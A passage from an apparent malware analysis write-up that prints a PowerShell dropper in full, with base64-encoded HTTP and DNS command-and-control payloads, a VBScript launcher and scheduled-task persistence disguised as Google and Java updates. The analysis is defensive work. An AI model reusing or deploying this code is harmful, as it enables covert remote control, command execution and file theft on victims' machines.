QAgACQAYQBbADEAXQAgACsAIAAiACIAOwAgAH0ADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAFAAUwBlAHIAdgBlAHIAIAAtAGEAbgBkACAAJABQAFUAcwBlACAALQBlAHEAIAAiAHQAIgApAA0ACgAJAHsADQAKAAkACQAkAHUAcgBpACAAPQAgACIAaAB0AHQAcAA6AC8ALwAiACAAKwAgACQAUABTAGUAcgB2AGUAcgAgACsAIAAiADoAIgAgACsAIAAkAFAAUABvAHIAdAA7AA0ACgAJAAkAJABwAHIAbwB4AHkAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAKAAkAHUAcgBpACwAIAAkAHQAcgB1AGUAKQA7AA0ACgAJAAkAJABwAHIAbwB4AHkALgBjAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAkAFAAVQBzAGUAcgAsACAAJABQAFAAYQBzAHMALAAgACQAUABEAG8AbQApAA0ACgAJAAkAJAB7AGcAbABvAGIAYQBsADoAJAB3AGMAfQAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKAAkACQAkAHsAZwBsAG8AYgBhAGwAOgAkAHcAYwB9AC4AcAByAG8AeAB5ACAAPQAgACQAcAByAG8AeAB5ADsADQAKAAkAfQANAAoACQBlAGwAcwBlAA0ACgAJAHsADQAKAAkACQAkAHsAZwBsAG8AYgBhAGwAOgAkAHcAYwB9ACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABzAHkAcwB0AGUAbQAuAG4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwANAAoACQB9AA0ACgB9AA0ACgBsAGQAQwBmAGcAOwANAAoAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAewBnAGwAbwBiAGEAbAA6ACQAcgBQAGEAdABoAH0AKQApACAAewAgAE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAFAAYQB0AGgAIAAkAHsAZwBsAG8AYgBhAGwAOgAkAHIAUABhAHQAaAB9ADsAIAB9AA0ACgAkAGEAZAByACAAPQAgAGEAZAByAEMAdAAgACIAMgA0ADMANQAxADIANAAzADUAMQAwACIAIAAiADAAIgANAAoAJAByAGkAZAAgAD0AIAAoACQAewBnAGwAbwBiAGEAbAA6ACQAdwBjAH0ALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGEAZAByACkAIAArACAAIgAgACIAKQAuAFQAcgBpAG0AKAApADsADQAKAGkAZgAgACgAJAByAGkAZAApAA0ACgB7AA0ACgAJAGkAZgAgACgAJAByAGkAZAAuAGwAZQBuAGcAdABoACAALQBlAHEAIAAxADEAKQANAAoACQB7AA0ACgAJAAkAJABhAGQAcgAgAD0AIABhAGQAcgBDAHQAIAAiACQAcgBpAGQAIgAgACIAMQAiAA0ACgAJAAkAJAByACAAPQAgACQAewBnAGwAbwBiAGEAbAA6ACQAdwBjAH0ALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGEAZAByACkAOwANAAoACQAJACQAcgBjAG4AdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBEAGUAZgBhAHUAbAB0AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByACkAKQA7AA0ACgAJAAkAJABhAGQAcgAgAD0AIABhAGQAcgBDAHQAIAAiACQAcgBpAGQAIgAgACIAMwAiAA0ACgAJAAkAJAB7AGcAbABvAGIAYQBsADoAJAB3AGMAfQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACQAYQBkAHIAKQA7AA0ACgAJAAkAaQBmACAAKAAkAHIAaQBkAC4ARQBuAGQAcwBXAGkAdABoACgAIgAwACIAKQApAA0ACgAJAAkAewANAAoACQAJAAkAJAByAGMAbgB0ACAAPQAgACQAcgBjAG4AdAAgAHwAIAA/ACAAewAgACQAXwAuAHQAcgBpAG0AKAApACAALQBuAGUAIAAiACIAIAB9ADsADQAKAAkACQAJACQAcgBlAHMAIAArAD0AIAAkAHIAYwBuAHQALgBTAHAAbABpAHQAKAAiACYAIgApACAAfAAgAGYAbwByAGUAYQBjAGgALQBvAGIAagBlAGMAdAAgAHsAIAAkAF8AIAB8ACAAaQBlAHgAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgAH0ADQAKAAkACQBzAG4AZAByACAAJAByAGkAZAAgACQAcgBlAHMADQAKAAkACQB9AA0ACgAJAAkAZQBsAHMAZQBpAGYAIAAoACQAcgBpAGQALgBFAG4AZABzAFcAaQB0AGgAKAAiADEAIgApACkADQAKAAkACQB7AA0ACgAJAAkACQAkAGEAZAByACAAPQAgACQAcgBjAG4AdAAuAFQAcgBpAG0AKAApADsADQAKAAkACQAJAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGEAZAByACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJABhAGQAcgBTACAAPQAgAGEAZAByAEMAdAAgACIAJAByAGkAZAAiACAAIgA0ACIADQAKAAkACQAJAAkAJAB7AGcAbABvAGIAYQBsADoAJAB3AGMAfQAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAkAGEAZAByAFMALAAgACQAYQBkAHIAKQA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBlAGwAcwBlAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJAHMAbgBkAHIAIAAkAHIAaQBkACAAIgA0ADAANAAiADsADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAAkAZQBsAHMAZQBpAGYAIAAoACQAcgBpAGQALgBFAG4AZABzAFcAaQB0AGgAKAAiADIAIgApACkADQAKAAkACQB7AA0ACgAJAAkACQAkAHMAYQB2AEEAZAByACAAPQAgACIAJAB7AGcAbABvAGIAYQBsADoAJAByAFAAYQB0AGgAfQBcACQAcgBpAGQAIgA7AA0ACgAJAAkACQAkAHIAYwBuAHQAIAB8ACAAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABzAGEAdgBBAGQAcgA7AA0ACgAJAAkACQBzAG4AZAByACAAJAByAGkAZAAgACIAMgAwADAAPAA+ACQAcwBhAHYAQQBkAHIAIgA7AA0ACgAJAAkAfQANAAoACQB9AA0ACgB9AA0ACgA=";
function runByVBS
{
if (-not (Test-Path -Path ${global:$address1}))
{md ${global:$address1}}
if (Test-Path -Path ${global:$address1})
{
"set Shell0 = CreateObject(`"wscript.shell`")`nShell0.run `"powershell.exe -exec bypass -enc " + ${global:$http_ag} + "`", 0, false`nset Shell1 = CreateObject(`"wscript.shell`")`nShell1.run `"powershell.exe -exec bypass -enc " + ${global:$dns_ag} + "`", 0, false" | Out-File "${global:$address1}\GoogleUpdateTasks.vbs"
schtasks /create /F /sc minute /mo 1 /tn "\UpdateTasks\JavaUpdatesTasksHosts" /tr "wscript /b \`"${global:$address1}\GoogleUpdateTasks.vbs\`"";
schtasks /create /F /ru SYSTEM /sc minute /mo 1 /tn "\UpdateTasks\JavaUpdatesTasksHosts" /tr "wscript /b \`"${global:$address1}\GoogleUpdateTasks.vbs\`"";
}
}
runByVBS;

This PowerShell script has two base64 encoded strings ${global:$dns_ag} and ${global:$http_ag}. The PowerShell script takes these two encoded strings, creates a new VBScript file called GoogleUpdateTasks.vbs and then places them inside this file (as you can see in the section below). Then this script uses the schtasks command to create a schedule task to execute that GoogleUpdateTasks.vbs file every one minute. That schedule task is shown in the following figure:

Task Schedule 2

And in Kibana, your relevant document should look like the following:

schtasks.exe

In the figure above, the parent image is the PowerShell executable and the command line is the execution of that rUpdateChecker.ps1 script. Alright, we are moving on the inspect the VBscript file GoogleUpdateTasks.vbs and its functionally.

Trojan Dropper

File Characteristics

Filename: GoogleUpdateTasks.vbs
MD5 Hash: f0b278427c8841c5d1a79ed2631b1522

This PowerShell script GoogleUpdateTasks.vbs  contains the following data:

set Shell0 = CreateObject("wscript.shell")
Shell0.run "powershell.exe -exec bypass -enc JABzAHIAdgByACAAPQAgACIAaAB0AHQAcAA6AFwAXAAiACAAKwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEQAbgBzAF0AOgA6AEcAZQB0AEgAbwBzAHQAQQBkAGQAcgBlAHMAcwBlAHMAKAAiAHcAdwB3AC4AcAByAG8AeAB5AGMAaABlAGsAZQByAC4AcAByAG8AIgApACAAKwAiAC8AdQBwAGQAYQB0AGUAXwB3AGEAcABwAC4AYQBzAHAAeAAiADsADQAKACQAawA9AGcAZQB0AG0AYQBjACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAB8ACAAJQB7ACAAJABfACAALQBtAGEAdABjAGgAIAAnACgAPwA6AFsAMAAtADkAYQAtAGYAXQB7ADIAfQBbADoALQBdACkAewA1AH0AWwAwAC0AOQBhAC0AZgBdAHsAMgB9ACcAIAB9ADsADQAKAGkAZgAoACQAawApAHsAJAB7AGcAbABvAGIAYQBsADoAJABhAGkAZAB9ACAAPQAgACQAbQBhAHQAYwBoAGUAcwBbADAAXQAgAC0AcgBlAHAAbABhAGMAZQAgACIALQAiACwAIAAiACIAOwB9ACAAZQBsAHMAZQAgAHsAJAB7AGcAbABvAGIAYQBsADoAJABhAGkAZAB9ACAAPQAgAHcAaABvAGEAbQBpACAAfAAgACUAewBbAGIAeQB0AGUAWwBdAF0AWwBjAGgAYQByAFsAXQBdACQAXwAgAC0AagBvAGkAbgAgACcAJwB9ACAAIAB8ACAAJQB7ACQAXwAuAHMAdQBiAHMAdAByAGkAbgBnACgAMAAsADEAMQApAH0AIAB8ACAAJQB7ACQAXwAgACsAIAAiADEAMgAwADEAMgAwADAAMQAxADIAMgA0ACIAfQAgAHwAIAAlAHsAJABfAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAwACwAMQAxACkAfQB9AA0ACgAkAHsAZwBsAG8AYgBhAGwAOgAkAHIAUABhAHQAaAB9ACAAPQAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAIAArACAAIgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEoAYQB2AGEAXAAiACAAKwAgACQAewBnAGwAbwBiAGEAbAA6ACQAYQBpAGQAfQA7AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABzAG4AZAByAA0ACgB7AA0ACgAJAHAAYQByAGEAbQAoACQAZgBuAGEAbQBlACwAIAAkAGMAbgB0ACkADQAKAAkAJABhAGQAcgAgAD0AIABhAGQAcgBDAHQAIAAiACQAZgBuAGEAbQBlACIAIAAiADIAIgANAAoACQAkAHsAZwBsAG8AYgBhAGwAOgAkAHcAYwB9AC4AVQBwAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGEAZAByACwAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBEAGUAZgBhAHUAbAB0AC4ARwBlAHQAQgB5AHQAZQBzACgAJABjAG4AdAApACkAKQA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABhAGQAcgBDAHQADQAKAHsADQAKAAkAcABhAHIAYQBtACAAKAAkAHIAaQBkAEkAbgAsACAAJABhAGMAKQANAAoACQAkAGMAcgAgAD0AIABAACgAKQA7AA0ACgAJACQAZABhAHIAIAA9ACAAQAAoACkAOwANAAoACQAkAGQAYQByACAAPQAgAC0AagBvAGkAbgAgACgARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAKAAwACAALgAuACAAOQApACAALQBDAG8AdQBuAHQAIAAxADUAKQA7AA0ACgAJACQAYwByACAAPQAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACgAMAAgAC4ALgAgADkAKQAgAC0AQwBvAHUAbgB0ACAAMgA7AA0ACgAJACQAZABhAHIAIAA9ACAAJABkAGEAcgAuAEkAbgBzAGUAcgB0ACgAJABjAHIAWwAwAF0ALAAgACQAcgBpAGQASQBuAC4AVAByAGkAbQAoACkAKQAuAEkAbgBzAGUAcgB0ACgAKAAkAGMAcgBbADEAXQApACwAIAAkAHsAZwBsAG8AYgBhAGwAOgAkAGEAaQBkAH0AKQA7AA0ACgAJACQAYQBkAHIAIAA9ACAAIgAkACgAJABzAHIAdgByACkAPwB2AGUAcgBzAGkAbwBuAD0AJAAoACQAZABhAHIAKQA1ACQAKAAkAGEAYwApADcAJAAoACQAYwByAFsAMABdACkAJAAoACQAYwByAFsAMQBdACkAIgA7AA0ACgAJAHIAZQB0AHUAcgBuACAAJABhAGQAcgA7AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABsAGQAQwBmAGcADQAKAHsADQAKAAkAJABjAGYAZwBBAGQAcgAgAD0AIAAkAGUAbgB2ADoAVABNAFAAIAArACAAIgBcAGMAZgBnAC4AaQBuAGkAIgA7AA0ACgAJAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAoACQAYwBmAGcAQQBkAHIAKQApAA0ACgAJAHsADQAKAAkACQAkAGwAaQBuAGUAcwAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAgACgAJABjAGYAZwBBAGQAcgApACAAfAAgAFcAaABlAHIAZQAgAHsAIAAkAF8AIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAXgBcAHMAKwAkACcAIAB9AA0ACgAJAAkAZgBvAHIAZQBhAGMAaAAgACgAJABsAGkAbgBlACAAaQBuACAAJABsAGkAbgBlAHMAKQANAAoACQAJAHsADQAKAAkACQAJACQAYQAgAD0AIAAkAGwAaQBuAGUAIAAtAHMAcABsAGkAdAAgACcALAAnAA0ACgAJAAkACQBzAHcAaQB0AGMAaAAgACgAJABhAFsAMABdACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAIgB1AHMAcgAiAHsAIAAkAFAAVQBzAGUAcgAgAD0AIAAkAGEAWwAxAF0AIAArACAAIgAiADsAIAB9AA0ACgAJAAkACQAJACIAcABhAHMAIgB7ACAAJABQAFAAYQBzAHMAIAA9ACAAJABhAFsAMQBdACAAKwAgACIAIgA7ACAAfQANAAoACQAJAAkACQAiAHUAcwBlACIAewAgACQAUABVAHMAZQAgAD0AIAAkAGEAWwAxAF0AIAArACAAIgAiADsAIAB9AA0ACgAJAAkACQAJACIAcwByAHYAIgB7ACAAJABQAFMAZQByAHYAZQByACAAPQAgACQAYQBbADEAXQAgACsAIAAiACIAOwAgAH0ADQAKAAkACQAJAAkAIgBwAHIAdAAiAHsAIAAkAFAAUABvAHIAdAAgAD0AIAAkAGEAWwAxAF0AIAArACAAIgAiADsAIAB9AA0ACgAJAAkACQAJACIAZABvAG0AIgB7ACAAJABQAEQAbwBtACAAPQAgACQAYQBbADEAXQAgACsAIAAiACIAOwAgAH0ADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAFAAUwBlAHIAdgBlAHIAIAAtAGEAbgBkACAAJABQAFUAcwBlACAALQBlAHEAIAAiAHQAIgApAA0ACgAJAHsADQAKAAkACQAkAHUAcgBpACAAPQAgACIAaAB0AHQAcAA6AC8ALwAiACAAKwAgACQAUABTAGUAcgB2AGUAcgAgACsAIAAiADoAIgAgACsAIAAkAFAAUABvAHIAdAA7AA0ACgAJAAkAJABwAHIAbwB4AHkAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBQAHIAbwB4AHkAKAAkAHUAcgBpACwAIAAkAHQAcgB1AGUAKQA7AA0ACgAJAAkAJABwAHIAbwB4AHkALgBjAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBOAGUAdAB3AG8AcgBrAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAkAFAAVQBzAGUAcgAsACAAJABQAFAAYQBzAHMALAAgACQAUABEAG8AbQApAA0ACgAJAAkAJAB7AGcAbABvAGIAYQBsADoAJAB3AGMAfQAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsADQAKAAkACQAkAHsAZwBsAG8AYgBhAGwAOgAkAHcAYwB9AC4AcAByAG8AeAB5ACAAPQAgACQAcAByAG8AeAB5ADsADQAKAAkAfQANAAoACQBlAGwAcwBlAA0ACgAJAHsADQAKAAkACQAkAHsAZwBsAG8AYgBhAGwAOgAkAHcAYwB9ACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABzAHkAcwB0AGUAbQAuAG4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwANAAoACQB9AA0ACgB9AA0ACgBsAGQAQwBmAGcAOwANAAoAaQBmACAAKAAtAG4AbwB0ACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAewBnAGwAbwBiAGEAbAA6ACQAcgBQAGEAdABoAH0AKQApACAAewAgAE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAFAAYQB0AGgAIAAkAHsAZwBsAG8AYgBhAGwAOgAkAHIAUABhAHQAaAB9ADsAIAB9AA0ACgAkAGEAZAByACAAPQAgAGEAZAByAEMAdAAgACIAMgA0ADMANQAxADIANAAzADUAMQAwACIAIAAiADAAIgANAAoAJAByAGkAZAAgAD0AIAAoACQAewBnAGwAbwBiAGEAbAA6ACQAdwBjAH0ALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGEAZAByACkAIAArACAAIgAgACIAKQAuAFQAcgBpAG0AKAApADsADQAKAGkAZgAgACgAJAByAGkAZAApAA0ACgB7AA0ACgAJAGkAZgAgACgAJAByAGkAZAAuAGwAZQBuAGcAdABoACAALQBlAHEAIAAxADEAKQANAAoACQB7AA0ACgAJAAkAJABhAGQAcgAgAD0AIABhAGQAcgBDAHQAIAAiACQAcgBpAGQAIgAgACIAMQAiAA0ACgAJAAkAJAByACAAPQAgACQAewBnAGwAbwBiAGEAbAA6ACQAdwBjAH0ALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGEAZAByACkAOwANAAoACQAJACQAcgBjAG4AdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBEAGUAZgBhAHUAbAB0AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByACkAKQA7AA0ACgAJAAkAJABhAGQAcgAgAD0AIABhAGQAcgBDAHQAIAAiACQAcgBpAGQAIgAgACIAMwAiAA0ACgAJAAkAJAB7AGcAbABvAGIAYQBsADoAJAB3AGMAfQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACQAYQBkAHIAKQA7AA0ACgAJAAkAaQBmACAAKAAkAHIAaQBkAC4ARQBuAGQAcwBXAGkAdABoACgAIgAwACIAKQApAA0ACgAJAAkAewANAAoACQAJAAkAJAByAGMAbgB0ACAAPQAgACQAcgBjAG4AdAAgAHwAIAA/ACAAewAgACQAXwAuAHQAcgBpAG0AKAApACAALQBuAGUAIAAiACIAIAB9ADsADQAKAAkACQAJACQAcgBlAHMAIAArAD0AIAAkAHIAYwBuAHQALgBTAHAAbABpAHQAKAAiACYAIgApACAAfAAgAGYAbwByAGUAYQBjAGgALQBvAGIAagBlAGMAdAAgAHsAIAAkAF8AIAB8ACAAaQBlAHgAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgAH0ADQAKAAkACQBzAG4AZAByACAAJAByAGkAZAAgACQAcgBlAHMADQAKAAkACQB9AA0ACgAJAAkAZQBsAHMAZQBpAGYAIAAoACQAcgBpAGQALgBFAG4AZABzAFcAaQB0AGgAKAAiADEAIgApACkADQAKAAkACQB7AA0ACgAJAAkACQAkAGEAZAByACAAPQAgACQAcgBjAG4AdAAuAFQAcgBpAG0AKAApADsADQAKAAkACQAJAGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGEAZAByACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJABhAGQAcgBTACAAPQAgAGEAZAByAEMAdAAgACIAJAByAGkAZAAiACAAIgA0ACIADQAKAAkACQAJAAkAJAB7AGcAbABvAGIAYQBsADoAJAB3AGMAfQAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAkAGEAZAByAFMALAAgACQAYQBkAHIAKQA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBlAGwAcwBlAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJAHMAbgBkAHIAIAAkAHIAaQBkACAAIgA0ADAANAAiADsADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAAkAZQBsAHMAZQBpAGYAIAAoACQAcgBpAGQALgBFAG4AZABzAFcAaQB0AGgAKAAiADIAIgApACkADQAKAAkACQB7AA0ACgAJAAkACQAkAHMAYQB2AEEAZAByACAAPQAgACIAJAB7AGcAbABvAGIAYQBsADoAJAByAFAAYQB0AGgAfQBcACQAcgBpAGQAIgA7AA0ACgAJAAkACQAkAHIAYwBuAHQAIAB8ACAAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABzAGEAdgBBAGQAcgA7AA0ACgAJAAkACQBzAG4AZAByACAAJAByAGkAZAAgACIAMgAwADAAPAA+ACQAcwBhAHYAQQBkAHIAIgA7AA0ACgAJAAkAfQANAAoACQB9AA0ACgB9AA0ACgA=", 0, false
set Shell1 = CreateObject("wscript.shell")
Shell1.run "powershell.exe -exec bypass -enc aQBmACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACAALQBGAGkAbAB0AGUAcgAgACgAIgBOAGEAbQBlAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwAgAEEATgBEACAAQwBvAG0AbQBhAG4AZABMAGkAbgBlACAATABJAEsARQAgACcAJQAiACsAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAE0AeQBDAG8AbQBtAGEAbgBkAC4ATgBhAG0AZQAuAFQAcgBpAG0AKAApACsAIgAlACcAIgApACkALgBsAGUAbgBnAHQAaAAgAC0AbAB0ACAAMgApACAAewANAAoAJABhAGkAZAA9AHcAaABvAGEAbQBpACAAfAAgACUAewBbAGIAeQB0AGUAWwBdAF0AWwBjAGgAYQByAFsAXQBdACQAXwAgAC0AagBvAGkAbgAgACcAJwB9ACAAIAB8ACAAJQB7ACQAXwAuAHMAdQBiAHMAdAByAGkAbgBnACgAMAAsADEAMgApAH0AIAB8ACAAJQB7ACQAXwAgACsAIAAiADEAMgAwADEAMgAwADAAMQAxADIAMgA0ACIAfQAgAHwAIAAlAHsAJABfAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAwACwAMQAyACkAfQA7ACQAcwBwACAAPQAgACQAZQBuAHYAOgBUAEUATQBQADsADQAKACQAcwBtACAAPQAgACQAZgBhAGwAcwBlADsAJABjAHQAIAA9ACAAMAA7ACQAZgBiACAAPQAgAEAAKAApADsAJAByAG4AIAA9ACAAIgAwADAAMAAiADsAJABhAGMAIAA9ACAAIgAwACIAOwAkAHIAdQBuACAAPQAgACQAdAByAHUAZQA7ACQAZQBjAD0AMAA7AA0ACgBXAGgAaQBsAGUAIAAoACQAcgB1AG4AKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AbQAgADIAMAAwADsADQAKAGkAZgAoACQAZQBjACAALQBnAGUAIAA1ACkAewBlAHgAaQB0AH0ADQAKAGkAZgAgACgAJABjAHQAIAAtAGwAdAAgADEAMAApACAAewAgACQAcgBuACAAPQAgACIAMAAwACQAKAAkAGMAdAApACIAOwAgAH0AZQBsAHMAZQBpAGYAIAAoACQAYwB0ACAALQBsAHQAIAAxADAAMAApACAAewAgACQAcgBuACAAPQAgACIAMAAkACgAJABjAHQAKQAiADsAIAB9AGUAbABzAGUAIAB7ACAAJAByAG4AIAA9ACAAIgAkACgAJABjAHQAKQAiADsAIAB9AA0ACgAkAHIAYQBuAGQAIAA9ACAALQBqAG8AaQBuACAAKABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAoADEAMAAgAC4ALgAgADkAOQApACAALQBDAG8AdQBuAHQAIAAoACUAewAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEkAbgBwAHUAdABPAGIAagBlAGMAdAAgACgAMQAgAC4ALgAgADYAKQAgAH0AKQApADsADQAKAHQAcgB5AHsAJABsAGEAcwB0AEEAZABkAHIAZQBzAHMAPQAgACIAJAAoACQAcgBhAG4AZAApACQAKAAkAGEAYwApACQAKAAkAHIAbgApADcAJAAoACQAYQBpAGQAKQAuAHAAcgBvAHgAeQBjAGgAZQBrAGUAcgAuAHAAcgBvACIAOwANAAoAJAByAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ARABuAHMAXQA6ADoARwBlAHQASABvAHMAdABBAGQAZAByAGUAcwBzAGUAcwAoACQAbABhAHMAdABBAGQAZAByAGUAcwBzACkAOwB9AGMAYQB0AGMAaAB7ACQAZQBjACsAKwA7AGMAbwBuAHQAaQBuAHUAZQA7AH0ADQAKACQAcgBlAHMAdQBsAHQAIAA9ACAAJAByAHQAWwAwAF0ALgBJAFAAQQBkAGQAcgBlAHMAcwBUAG8AUwB0AHIAaQBuAGcAOwAkAHIAcwAgAD0AIAAkAHIAZQBzAHUAbAB0AC4AUwBwAGwAaQB0ACgAJwAuACcAKQA7AA0ACgBpAGYAIAAoACgAJAByAHMAWwAwAF0AIAAtAGUAcQAgADEAKQAgAC0AYQBuAGQAIAAoACQAcgBzAFsAMQBdACAALQBlAHEAIAAyACkAIAAtAGEAbgBkACAAKAAkAHIAcwBbADIAXQAgAC0AZQBxACAAMwApACkAewAkAHMAbQAgAD0AIAAkAGYAYQBsAHMAZQA7ACQAYQBjACAAPQAgACIAMAAiADsADQAKACQAbABlACAAPQAgACQAZgBiAC4ATABlAG4AZwB0AGgAOwBpAGYAIAAoACQAZgBiAFsAJABsAGUAbgAtADEAXQAgAC0AZQBxACAAMAAgAC0AYQBuAGQAIAAkAGYAYgBbACQAbABlAG4ALQAyAF0AIAAtAGUAcQAgADAAKQANAAoAewAkAGYAYgB0ACAAPQAgACQAZgBiAFsAMAAgAC4ALgAgACgAJABsAGUAIAAtACAAMwApAF0AOwB9AGUAbABzAGUAaQBmACAAKAAkAGYAYgBbACQAbABlACAALQAgADEAXQAgAC0AZQBxACAAMAApAHsAJABmAGIAdAAgAD0AIAAkAGYAYgBbADAAIAAuAC4AIAAoACQAbABlACAALQAgADIAKQBdADsAfQBlAGwAcwBlAHsAJABmAGIAdAAgAD0AIAAkAGYAYgA7AH0ADQAKAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAHMAcAAsACAAJABmAGIAdAApADsAJABmAGIAIAA9ACAAQAAoACkAOwAkAGMAdAAgAD0AIAAwADsAYgByAGUAYQBrADsAfQANAAoAaQBmACAAKAAkAHMAbQApAHsAaQBmACAAKAAkAGMAdAAgAC0AZwB0ACAAMgA1ADAAKQAgAHsAJABjAHQAIAA9ACAAMAA7AH0ADQAKAGkAZgAgACgAJABjAHQAIAAtAGUAcQAgACQAcgBzAFsAMwBdACkAewAkAGYAYgAgACsAPQAgACQAcgBzAFsAMABdADsAJABmAGIAIAArAD0AIAAkAHIAcwBbADEAXQA7ACQAZgBiACAAKwA9ACAAJAByAHMAWwAyAF0AOwAkAGMAdAAgAD0AIAAkAGMAdAAgACsAIAAzADsAfQB9AA0ACgBpAGYAIAAoACgAJAByAHMAWwAwAF0AIAAtAGUAcQAgADIANAApACAALQBhAG4AZAAgACgAJAByAHMAWwAxAF0AIAAtAGUAcQAgADEAMgA1ACkAKQB7ACQAcwBwACAAKwA9ACAAIgBcACIAIAArACAAJAByAHMAWwAyAF0AIAArACAAIgAiACAAKwAgACQAcgBzAFsAMwBdADsAJABzAG0AIAA9ACA